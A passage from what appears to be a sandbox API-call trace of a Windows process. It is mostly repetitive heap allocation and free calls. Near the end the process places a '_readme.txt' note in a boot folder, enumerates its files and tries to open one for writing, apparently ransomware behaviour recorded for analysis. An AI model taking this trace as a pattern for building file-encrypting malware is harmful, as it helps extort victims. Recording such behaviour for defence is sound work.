Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.231] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.236] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0097.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.236] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.236] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.236] PathFindFileNameW (pszPath="") returned="" [0097.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.237] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.237] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.237] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.238] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0097.238] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0097.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.238] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.238] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.239] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.239] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.239] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0097.239] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.239] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a48220, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.239] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned=".txt" [0097.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.239] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a48220, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, 